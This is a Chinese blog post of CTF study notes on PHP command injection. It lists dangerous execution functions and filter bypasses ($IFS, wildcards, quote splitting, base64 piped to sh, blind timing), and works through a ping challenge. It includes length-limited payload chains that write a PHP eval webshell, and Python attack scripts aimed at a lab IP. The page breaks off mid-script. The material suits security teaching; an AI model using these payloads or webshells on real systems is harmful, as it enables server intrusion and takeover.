<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>命令执行 | jothon&#39;s blog</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  
  
  
  
  <meta name="description" content="常见危险函数systemsystem()函数可以执行系统命令, 并将命令执行的结果直接输出到界面中, 使用时直接在参数中传入需要执行的命令即可 Passthrupassthru()函数可以执行系统命令, 并将执行结果输出到页面中, 与system()函数不同的是, 它支持二进制的数据, 更多的用于文件, 图片等操作, 使用时直接在参数中传递字符串类型的系统命令即可 shell_execshell_">
<meta property="og:type" content="article">
<meta property="og:title" content="命令执行">
<meta property="og:url" content="https://jothon.github.io/2024/07/26/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/index.html">
<meta property="og:site_name" content="jothon&#39;s blog">
<meta property="og:description" content="常见危险函数systemsystem()函数可以执行系统命令, 并将命令执行的结果直接输出到界面中, 使用时直接在参数中传入需要执行的命令即可 Passthrupassthru()函数可以执行系统命令, 并将执行结果输出到页面中, 与system()函数不同的是, 它支持二进制的数据, 更多的用于文件, 图片等操作, 使用时直接在参数中传递字符串类型的系统命令即可 shell_execshell_">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://jothon.github.io/img/1722310534823-4.png">
<meta property="og:image" content="https://jothon.github.io/img/1722310534824-5.png">
<meta property="og:image" content="https://jothon.github.io/img/1722310534824-6.png">
<meta property="og:image" content="https://jothon.github.io/img/1722310534824-7.png">
<meta property="og:image" content="https://jothon.github.io/img/1722310534824-8.png">
<meta property="og:image" content="https://jothon.github.io/img/1722310534825-9.png">
<meta property="og:image" content="https://jothon.github.io/img/1722310534825-10.png">
<meta property="og:image" content="https://jothon.github.io/img/1722310534825-11.png">
<meta property="og:image" content="https://jothon.github.io/img/1722310534825-12.png">
<meta property="og:image" content="https://jothon.github.io/img/1722310534825-13.png">
<meta property="og:image" content="https://jothon.github.io/img/1722310534826-14.png">
<meta property="og:image" content="https://jothon.github.io/img/1722310534826-15.png">
<meta property="og:image" content="https://jothon.github.io/img/1722310534826-16.png">
<meta property="og:image" content="https://jothon.github.io/img/1722310534826-17.png">
<meta property="og:image" content="https://jothon.github.io/img/1722310534826-18.png">
<meta property="og:image" content="https://jothon.github.io/img/1722310534826-19.png">
<meta property="og:image" content="https://jothon.github.io/img/1722310534826-20.png">
<meta property="og:image" content="https://jothon.github.io/img/1722310534826-21.png">
<meta property="og:image" content="https://jothon.github.io/img/1722310534826-22.png">
<meta property="og:image" content="https://jothon.github.io/img/1722310534826-23.png">
<meta property="article:published_time" content="2024-07-26T12:51:52.000Z">
<meta property="article:modified_time" content="2024-07-30T03:40:43.462Z">
<meta property="article:author" content="jothon">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://jothon.github.io/img/1722310534823-4.png">
  
    <link rel="alternate" href="/atom.xml" title="jothon&#39;s blog" type="application/atom+xml">
  
  <link rel="icon" href="/css/images/favicon.ico">
  
  <link href="https://fonts.googleapis.com/css?family=Open+Sans|Montserrat:700" rel="stylesheet" type="text/css">
  <link href="https://fonts.googleapis.com/css?family=Roboto:400,300,300italic,400italic" rel="stylesheet" type="text/css">
  <link href="//cdn.bootcss.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet">
  <style type="text/css">
    @font-face{font-family:futura-pt;src:url(https://use.typekit.net/af/9749f0/00000000000000000001008f/27/l?subset_id=2&fvd=n5) format("woff2");font-weight:500;font-style:normal;}
    @font-face{font-family:futura-pt;src:url(https://use.typekit.net/af/90cf9f/000000000000000000010091/27/l?subset_id=2&fvd=n7) format("woff2");font-weight:500;font-style:normal;}
    @font-face{font-family:futura-pt;src:url(https://use.typekit.net/af/8a5494/000000000000000000013365/27/l?subset_id=2&fvd=n4) format("woff2");font-weight:lighter;font-style:normal;}
    @font-face{font-family:futura-pt;src:url(https://use.typekit.net/af/d337d8/000000000000000000010095/27/l?subset_id=2&fvd=i4) format("woff2");font-weight:400;font-style:italic;}</style>
    
  <link rel="stylesheet" id="athemes-headings-fonts-css" href="//fonts.googleapis.com/css?family=Yanone+Kaffeesatz%3A200%2C300%2C400%2C700&amp;ver=4.6.1" type="text/css" media="all">

  <link rel="stylesheet" id="athemes-headings-fonts-css" href="//fonts.googleapis.com/css?family=Oswald%3A300%2C400%2C700&amp;ver=4.6.1" type="text/css" media="all">
  
<link rel="stylesheet" href="/css/style.css">


  
<script src="/js/jquery-3.1.1.min.js"></script>


  <!-- Bootstrap core CSS -->
  <link rel="stylesheet" href="/css/bootstrap.css" >
  <link rel="stylesheet" href="/css/fashion.css" >
  <link rel="stylesheet" href="/css/glyphs.css" >

<meta name="generator" content="Hexo 7.3.0"><link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>



  <body data-spy="scroll" data-target="#toc" data-offset="50">


  
  
  <div class="site-header-image">
    <img id="originBg" width="100%" alt="Hike News" src="">
  </div>

  <div id="header-blur" class="site-header-image blur" style="position: absolute; top:0; height: 207px; min-height: 207px; min-width: 100%;">
    <img id="blurBg" width="100%" style="top: 96%" alt="Hike News" src="">
  </div>

  <script>
        var imgUrls = "css/images/pose01.jpg,https://source.unsplash.com/collection/954550/1920x1080,https://source.unsplash.com/collection/954550/1920x1081".split(",");
        var random = Math.floor((Math.random() * imgUrls.length ));
        if (imgUrls[random].startsWith('http') || imgUrls[random].indexOf('://') >= 0) {
          document.getElementById("originBg").src=imgUrls[random];
          document.getElementById("blurBg").src=imgUrls[random];
        } else {
          document.getElementById("originBg").src='/' + imgUrls[random];
          document.getElementById("blurBg").src='/' + imgUrls[random];
        }
    </script>




<header id="allheader" class="site-header" role="banner" 
   style="width: 100%; position: absolute; top:0; background: rgba(255,255,255,.8);"  >
  <div class="clearfix container">
      <div class="site-branding">

          <h1 class="site-title">
            
              <a href="/" title="jothon&#39;s blog" rel="home"> jothon&#39;s blog </a>
            
          </h1>
          
          
            <div class="site-description">变强一点点</div>
          
            
          <nav id="main-navigation" class="main-navigation" role="navigation">
            <a class="nav-open">Menu</a>
            <a class="nav-close">Close</a>

            <div class="clearfix sf-menu">
              <ul id="main-nav" class="menu sf-js-enabled sf-arrows"  style="touch-action: pan-y;">
                    
                      <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-1663" linktext="/"> <a class="" href="/">Home</a> </li>
                    
                      <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-1663" linktext="archives"> <a class="" href="/archives">Archives</a> </li>
                    
                      <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-1663" linktext="categories"> <a class="" href="/categories">Categories</a> </li>
                    
                      <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-1663" linktext="tags"> <a class="" href="/tags">Tags</a> </li>
                    
                      <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-1663" linktext="about"> <a class="" href="/about">About</a> </li>
                    
              </ul>
            </div>
          </nav>

      </div>
  </div>
</header>


  <div id="container">
    <div id="wrap">
            
      <div id="content" class="outer">
        
          <section id="main" style="float:none;"><article id="post-命令执行" style="width: 66%; float:left;" class="article article-type-post" itemscope itemprop="blogPost" >
  <div id="articleInner" class="clearfix post-1016 post type-post status-publish format-standard has-post-thumbnail hentry category-template-2 category-uncategorized tag-codex tag-edge-case tag-featured-image tag-image tag-template">
    
    
      <header class="article-header">
        
  
    <h1 class="thumb" class="article-title" itemprop="name">
      命令执行
    </h1>
  

      </header>
    
    <div class="article-meta">
      
	<a href="/2024/07/26/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/" class="article-date">
	  <time datetime="2024-07-26T12:51:52.000Z" itemprop="datePublished">七月 26, 2024</time>
	</a>

      
	<span class="ico-folder"></span>
    <a class="article-category-link" href="/categories/web/">web</a>
 
      
	<span id="busuanzi_container_page_pv">
	  本文总阅读量<span id="busuanzi_value_page_pv"></span>次
	</span>

    </div>
    <div class="article-entry" itemprop="articleBody">
      
        <h3 id="常见危险函数"><a href="#常见危险函数" class="headerlink" title="常见危险函数"></a>常见危险函数</h3><h4 id="system"><a href="#system" class="headerlink" title="system"></a>system</h4><p>system()函数可以执行系统命令, 并将命令执行的结果直接输出到界面中, 使用时直接在参数中传入需要执行的命令即可</p>
<h4 id="Passthru"><a href="#Passthru" class="headerlink" title="Passthru"></a>Passthru</h4><p>passthru()函数可以执行系统命令, 并将执行结果输出到页面中, 与system()函数不同的是, 它支持二进制的数据, 更多的用于文件, 图片等操作, 使用时直接在参数中传递字符串类型的系统命令即可</p>
<h4 id="shell-exec"><a href="#shell-exec" class="headerlink" title="shell_exec"></a>shell_exec</h4><p>shell_exec()函数可以执行系统命令, 但它不会直接输出执行的结果, 而是返回一个字符串类型的变量来存储系统命令的执行结果, 在参数中传递需要执行的系统命令即可</p>
<h4 id="反引号"><a href="#反引号" class="headerlink" title="反引号"></a>反引号</h4><p>反引号可以执行系统命令, 但它不会输出结果, 而是返回一个字符串类型的变量, 用来存储系统命令的执行结果, 可单独使用, 也可配合其他命令执行函数使用来绕过参数中的过滤条件</p>
<h4 id="popen"><a href="#popen" class="headerlink" title="popen"></a>popen</h4><p>popen()函数可以执行系统命令, 但不会输出执行的结果, 而是返回一个资源类型的变量用来存储系统命令的执行结果, 需要配合fread()函数来读取命令的执行结果</p>
<h4 id="proc-open"><a href="#proc-open" class="headerlink" title="proc_open"></a>proc_open</h4><p>proc_open — 执行一个命令，并且打开用来输入&#x2F;输出的文件指针。</p>
<p>参数：command    descriptor_spec    pipes   </p>
<p>作用类似于popen</p>
<h3 id="绕过方式"><a href="#绕过方式" class="headerlink" title="绕过方式"></a>绕过方式</h3><h4 id="空格过滤绕过"><a href="#空格过滤绕过" class="headerlink" title="空格过滤绕过"></a>空格过滤绕过</h4><p>1：利用大括号进行绕过</p>
<p><strong>?<strong><strong>cmd</strong></strong>{<strong><strong>ls</strong></strong>,-l}</strong></p>
<p>2:$IFS代替空格；$IFS,${IFS},$IFS$9</p>
<p>3:重定向字符  &lt;,&lt;&gt;</p>
<p>“&lt;”表示的是输入重定向的意思，就是把&lt;后面跟的文件取代键盘作为新的设备</p>
<p><strong>?<strong><strong>cmd</strong></strong>&#x3D;cat&lt;flag.php</strong></p>
<p>4:%09(Tab)</p>
<p>payload为</p>
<p><strong>?cmd&#x3D;cat%09flag.php</strong></p>
<h5 id="例题"><a href="#例题" class="headerlink" title="例题"></a>例题</h5><p>**[GXYCTF 2019]**<strong>Ping</strong> <strong>Ping Ping</strong></p>
<p>ping是ip的一个参数:可以联想到127.0.0.1</p>
<p>查看当前存在的目录文件夹：?ip&#x3D;127.0.0.1;ls</p>
<p><img src="/img/1722310534823-4.png" alt="img"></p>
<p>找到flag.php,index.php</p>
<p>cat flag.php,发现空格绕过，这里使用$IFS$9进行绕过</p>
<p><img src="/img/1722310534824-5.png" alt="img"></p>
<p>cat index.php</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">        |\<span class="string">&#x27;|\&quot;|\\|\(|\)|\[|\]|\&#123;|\&#125;/&quot;, $ip, $match))&#123;</span></span><br><span class="line"><span class="string">                        print_r($match);</span></span><br><span class="line"><span class="string">                        print($ip);</span></span><br><span class="line"><span class="string">                        echo preg_match(&quot;/\&amp;|\/|\?|\*|\&lt;|[\x&#123;00&#125;-\x&#123;20&#125;]|\&gt;|\&#x27;|\&quot;|\\|\(|\)|\[|\]|\&#123;|\&#125;/&quot;, $ip, $match);</span></span><br><span class="line"><span class="string">                        die(&quot;fxck your symbol!&quot;);</span></span><br><span class="line"><span class="string">                &#125;</span></span><br><span class="line"><span class="string">                else if(preg_match(&quot;/ /&quot;, $ip))&#123;</span></span><br><span class="line"><span class="string">                        die(&quot;fxck your space!&quot;);</span></span><br><span class="line"><span class="string">                &#125;</span></span><br><span class="line"><span class="string">                else if(preg_match(&quot;/bash/&quot;, $ip))&#123;</span></span><br><span class="line"><span class="string">                        die(&quot;fxck your bash!&quot;);</span></span><br><span class="line"><span class="string">                &#125;</span></span><br><span class="line"><span class="string">                else if(preg_match(&quot;/.*f.*l.*a.*g.*/&quot;, $ip))&#123;</span></span><br><span class="line"><span class="string">                        die(&quot;fxck your flag!&quot;);</span></span><br><span class="line"><span class="string">                &#125;</span></span><br><span class="line"><span class="string">                $a = shell_exec(&quot;ping -c 4 &quot;.$ip);</span></span><br><span class="line"><span class="string">                echo &quot;</span></span><br><span class="line"><span class="string">&quot;;</span></span><br><span class="line"><span class="string">                print_r($a);</span></span><br><span class="line"><span class="string">        &#125;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">        ?&gt;</span></span><br></pre></td></tr></table></figure>

<p>可以发现对flag字符进行了绕过，</p>
<ul>
<li>如果输入的 IP 地址中包含特殊符号（如 |()[]{}&#x2F;“）或者一些特殊字符（如 &amp;&#x2F;?*()&lt;空格&gt;），则会输出 “fxck your symbol!”。</li>
<li>如果输入的 IP 地址中包含空格，则会输出 “fxck your space!”。</li>
<li>如果输入的 IP 地址中包含 “bash” 字符串，则会输出 “fxck your bash!”。</li>
<li>如果输入的 IP 地址中包含 “flag” 字符串（不区分大小写），则会输出 “fxck your flag!”。</li>
<li>最后，无论如何都会执行一个 ping 命令来测试输入的 IP 地址，并输出 ping 的结果。</li>
</ul>
<p>解题思路： （1）<strong>创建变量实现字符串拼接</strong>：构造**&#x2F;?<strong><strong>ip</strong></strong>&#x3D;127.0.0.1;b&#x3D;ag;a&#x3D;fl;cat$<strong><strong>IFS</strong></strong>$1$a$b.php**即可获取flag 注：此处将变量ab的位置互换是为了绕过字符串匹配（内联执行）</p>
<p>（2）<strong>通过执行sh命令来执行</strong> （bash被过滤了，不然也可以执行）</p>
<p>构造**&#x2F;?ip&#x3D;127.0.0.1;echo$<strong><strong>IFS</strong></strong>$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh**</p>
<p>注：sh是linux中运行shell的命令，bash相当于sh的升级版，sh∈bash</p>
<h4 id="文件名过滤绕过"><a href="#文件名过滤绕过" class="headerlink" title="文件名过滤绕过"></a>文件名过滤绕过</h4><p>1:通配符 <strong>？</strong> *****  进行绕过</p>
<p><strong>?<strong><strong>cmd</strong></strong>&#x3D;passthru(‘cat f?ag.p?p’)</strong></p>
<p>2:单引号和双引号绕过</p>
<p><strong>?<strong><strong>cmd</strong></strong>&#x3D;passthru(‘cat fl””‘ag.ph””p);</strong></p>
<p>3:反斜杠\绕过</p>
<p>把特殊字符去掉功能性，单纯表示为字符串</p>
<p> <strong>echo 1&gt;2</strong></p>
<p> <strong>1&gt;2</strong></p>
<p><strong>?<strong><strong>cmd</strong></strong>&#x3D;passthru(‘cat fl\ag.p\hp’)</strong></p>
<p>4:特殊变量</p>
<p>$1到$9,$@和$*  输出为空</p>
<p><strong>?<strong><strong>cmd</strong></strong>&#x3D;passthru(‘cat fl$1ag.p$9hp’)</strong></p>
<p>5:内联执行：即自定义字符串，在拼接起来</p>
<p><strong>?<strong><strong>cmd</strong></strong>&#x3D;passthru(‘a&#x3D;f;d&#x3D;<strong><strong>ag</strong></strong>;c&#x3D;l;cat $a$c$d’)</strong></p>
<h4 id="无回显时间盲注"><a href="#无回显时间盲注" class="headerlink" title="无回显时间盲注"></a>无回显时间盲注</h4><p>命令盲注</p>
<p>页面无法shell反弹或者无法回显，或者没有写入权限，可以尝试命令盲注,根据返回时间来进行判断</p>
<p>相关命令</p>
<p>1:sleep</p>
<p>2:awk NR&#x3D;&#x3D;1   #awk逐行获取数据</p>
<p>3:cut -c   #逐个获取单个字符</p>
<p><img src="/img/1722310534824-6.png" alt="img"></p>
<p>4:if判断语句使用</p>
<p>If [ $(cat flag.php | awk NR&#x3D;&#x3D;1 | cut -c 1 ) &#x3D;&#x3D; f] then echo “right”;fi</p>
<h4 id="常见文件读取命令绕过"><a href="#常见文件读取命令绕过" class="headerlink" title="常见文件读取命令绕过"></a>常见文件读取命令绕过</h4><p>1:tac  反向显示；</p>
<p>**?<strong><strong>cmd</strong></strong>&#x3D;system(“**<strong>tac</strong> <strong>fl\ag.p\hp”);</strong></p>
<p>2:more  一页一页的显示档案内容；</p>
<p>3:less   与more类似；</p>
<p>4:tali   查看末尾几行；</p>
<p>默认显示最后十行</p>
<p>5:nl   显示的时候，顺便输出行号；</p>
<p>6:od   以二进制的方式读取档案内容；</p>
<p>Ascill转化为字符串的形式</p>
<p>7:xxd  读取二进制文件；</p>
<p>类似于010里的左16进制右字符串的形式</p>
<p>8:sort  主要用于排序文件；</p>
<p>绝对路径＋sort+flag,php</p>
<p>9:uniq  报告或删除文件中重复的行；</p>
<p>10:file -f  报错出具体内容；</p>
<p>11:grep   在文本中查找指定内容的字符串；</p>
<p>?cmd&#x3D;passthru(“grep fla fla*”)</p>
<p>解析：从文本flag里搜索包含“fla”字符串的行</p>
<h4 id="编码绕过"><a href="#编码绕过" class="headerlink" title="编码绕过"></a>编码绕过</h4><p>1:base64绕过</p>
<p>将cat flag.php转化为base64编码进行绕过</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> base64</span><br><span class="line">S=<span class="string">b&#x27;cat flag.php&#x27;</span></span><br><span class="line">e64=base64.b64encode(S)</span><br><span class="line"><span class="built_in">print</span>(e64)</span><br></pre></td></tr></table></figure>

<p>即cat flag.php -&gt; Y2F0IGZsYWcucGhw</p>
<p>2:base32绕过</p>
<p>同上述base64一样</p>
<h4 id="长度限制绕过"><a href="#长度限制绕过" class="headerlink" title="长度限制绕过"></a>长度限制绕过</h4><h5 id="长度为7绕过"><a href="#长度为7绕过" class="headerlink" title="长度为7绕过"></a>长度为7绕过</h5><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"> </span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="title function_ invoke__">strlen</span>(<span class="variable">$_GET</span>[<span class="number">1</span>]&lt;<span class="number">7</span>))&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="title function_ invoke__">strlen</span>(<span class="variable">$_GET</span>[<span class="number">1</span>]);</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&#x27;&lt;hr/&gt;&#x27;</span>;</span><br><span class="line">    <span class="keyword">echo</span> <span class="title function_ invoke__">shell_exec</span>(<span class="variable">$_GET</span>[<span class="number">1</span>]);</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">exit</span>(<span class="string">&#x27;too long&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"> </span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>需要掌握的知识点</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&gt;a    <span class="comment">#虽然没有输入但是会创建a这个文件</span></span><br><span class="line">ls -t    <span class="comment">#ls基于基于事件排序（从晚到早）</span></span><br><span class="line">sh a    <span class="comment">#sh会把a里面的每行内容当作命令来执行</span></span><br><span class="line">使用\进行命令拼接    <span class="comment">#l\ s    =    ls</span></span><br><span class="line">base64    <span class="comment">#使用base64编码避免特殊字符</span></span><br></pre></td></tr></table></figure>

<p>我们需要传入的一句话木马&lt;?php eval($_GET[1]);，经过base64编码后PD9waHAgZXZhbCgkX0dFVFsxXSk7</p>
<p>即我们所需要执行的语句为<strong>echo PD9waHAgZXZhbCgkX0dFVFsxXSk7|base64 -d&gt;1.php</strong></p>
<p>构造payload</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line">&gt;hp</span><br><span class="line">&gt;<span class="number">1</span>.p\\</span><br><span class="line">&gt;d\&gt;\\</span><br><span class="line">&gt;\ -\\</span><br><span class="line">&gt;e64\\</span><br><span class="line">&gt;bas\\</span><br><span class="line">&gt;<span class="number">7</span>\|\\</span><br><span class="line">&gt;XSk\\</span><br><span class="line">&gt;Fsx\\</span><br><span class="line">&gt;dFV\\</span><br><span class="line">&gt;kX0\\</span><br><span class="line">&gt;bCg\\</span><br><span class="line">&gt;XZh\\</span><br><span class="line">&gt;AgZ\\</span><br><span class="line">&gt;waH\\</span><br><span class="line">&gt;PD9\\</span><br><span class="line">&gt;o\ \\</span><br><span class="line">&gt;ech\\</span><br><span class="line">ls -t&gt;<span class="number">0</span></span><br><span class="line">sh <span class="number">0</span></span><br><span class="line"><span class="comment">#因为涉及到2次写入，所以后面有2个斜杆</span></span><br><span class="line"><span class="comment">#!/usr/bin/python</span></span><br><span class="line"><span class="comment"># -*- coding: UTF-8 -*-</span></span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line">import requests</span><br><span class="line"> </span><br><span class="line">url = <span class="string">&quot;http://192.168.61.157/rce.php?1=&#123;0&#125;&quot;</span></span><br><span class="line"><span class="keyword">print</span>(<span class="string">&quot;[+]start attack!!!&quot;</span>)</span><br><span class="line">with <span class="title function_ invoke__">open</span>(<span class="string">&quot;payload.txt&quot;</span>,<span class="string">&quot;r&quot;</span>) <span class="keyword">as</span> f:</span><br><span class="line">        <span class="keyword">for</span> i in f:</span><br><span class="line">                <span class="keyword">print</span>(<span class="string">&quot;[*]&quot;</span> + url.<span class="title function_ invoke__">format</span>(i.<span class="title function_ invoke__">strip</span>()))</span><br><span class="line">                requests.<span class="title function_ invoke__">get</span>(url.<span class="title function_ invoke__">format</span>(i.<span class="title function_ invoke__">strip</span>()))</span><br><span class="line"> </span><br><span class="line"><span class="comment">#检查是否攻击成功</span></span><br><span class="line">test = requests.<span class="title function_ invoke__">get</span>(<span class="string">&quot;http://192.168.61.157/1.php&quot;</span>)</span><br><span class="line"><span class="keyword">if</span> test.status_code == requests.codes.ok:</span><br><span class="line">        <span class="keyword">print</span>(<span class="string">&quot;[*]Attack success!!!&quot;</span>)</span><br></pre></td></tr></table></figure>

<h5 id="长度为5绕过"><a href="#长度为5绕过" class="headerlink" title="长度为5绕过"></a>长度为5绕过</h5><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="variable">$sandbox</span> = <span class="string">&#x27;/www/sandbox/&#x27;</span> . <span class="title function_ invoke__">md5</span>(<span class="string">&quot;orange&quot;</span> . <span class="variable">$_SERVER</span>[<span class="string">&#x27;REMOTE_ADDR&#x27;</span>]);</span><br><span class="line">    @<span class="title function_ invoke__">mkdir</span>(<span class="variable">$sandbox</span>);</span><br><span class="line">    @<span class="title function_ invoke__">chdir</span>(<span class="variable">$sandbox</span>);</span><br><span class="line">    <span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;cmd&#x27;</span>]) &amp;&amp; <span class="title function_ invoke__">strlen</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;cmd&#x27;</span>]) &lt;= <span class="number">5</span>) &#123;</span><br><span class="line">        @<span class="title function_ invoke__">exec</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;cmd&#x27;</span>]);</span><br><span class="line">    &#125; <span class="keyword">else</span> <span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;reset&#x27;</span>])) &#123;</span><br><span class="line">        @<span class="title function_ invoke__">exec</span>(<span class="string">&#x27;/bin/rm -rf &#x27;</span> . <span class="variable">$sandbox</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>和长度为7的一样的解法，但是这里也有其他许多解法，例如反弹shell</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br></pre></td><td class="code"><pre><span class="line">&gt;dir</span><br><span class="line">&gt;f\&gt;</span><br><span class="line">&gt;ht-</span><br><span class="line">&gt;sl</span><br><span class="line">*&gt;v</span><br><span class="line">&gt;rev</span><br><span class="line">*v&gt;<span class="number">0</span></span><br><span class="line">&gt;a</span><br><span class="line">&gt;hp</span><br><span class="line">&gt;p\\</span><br><span class="line">&gt;<span class="number">1</span>.\\</span><br><span class="line">&gt;\&gt;\\</span><br><span class="line">&gt;-d\\</span><br><span class="line">&gt;\ \\</span><br><span class="line">&gt;<span class="number">64</span>\\</span><br><span class="line">&gt;se\\</span><br><span class="line">&gt;ba\\</span><br><span class="line">&gt;\|\\</span><br><span class="line">&gt;<span class="number">7</span>\\</span><br><span class="line">&gt;Sk\\</span><br><span class="line">&gt;X\\</span><br><span class="line">&gt;x\\</span><br><span class="line">&gt;Fs\\</span><br><span class="line">&gt;FV\\</span><br><span class="line">&gt;d\\</span><br><span class="line">&gt;X0\\</span><br><span class="line">&gt;k\\</span><br><span class="line">&gt;g\\</span><br><span class="line">&gt;bC\\</span><br><span class="line">&gt;h\\</span><br><span class="line">&gt;XZ\\</span><br><span class="line">&gt;gZ\\</span><br><span class="line">&gt;A\\</span><br><span class="line">&gt;aH\\</span><br><span class="line">&gt;w\\</span><br><span class="line">&gt;D9\\</span><br><span class="line">&gt;P\\</span><br><span class="line">&gt;S&#125;\\</span><br><span class="line">&gt;IF\\</span><br><span class="line">&gt;&#123;\\</span><br><span class="line">&gt;\$\\</span><br><span class="line">&gt;o\\</span><br><span class="line">&gt;ch\\</span><br><span class="line">&gt;e\\</span><br><span class="line">sh <span class="number">0</span></span><br><span class="line">sh f            </span><br><span class="line"><span class="comment">#!/usr/bin/python</span></span><br><span class="line"><span class="comment"># -*- coding: UTF-8 -*-</span></span><br><span class="line">import requests</span><br><span class="line">url = <span class="string">&quot;http://192.168.61.157/?cmd=&#123;0&#125;&quot;</span></span><br><span class="line"><span class="keyword">print</span>(<span class="string">&quot;[+]start attack!!!&quot;</span>)</span><br><span class="line">with <span class="title function_ invoke__">open</span>(<span class="string">&quot;payload.txt&quot;</span>,<span class="string">&quot;r&quot;</span>) <span class="keyword">as</span> f:</span><br><span class="line">    <span class="keyword">for</span> i in f:</span><br><span class="line">        <span class="keyword">print</span>(<span class="string">&quot;[*]&quot;</span> + url.<span class="title function_ invoke__">format</span>(i.<span class="title function_ invoke__">strip</span>()))</span><br><span class="line">        requests.<span class="title function_ invoke__">get</span>(url.<span class="title function_ invoke__">format</span>(i.<span class="title function_ invoke__">strip</span>()))</span><br><span class="line"><span 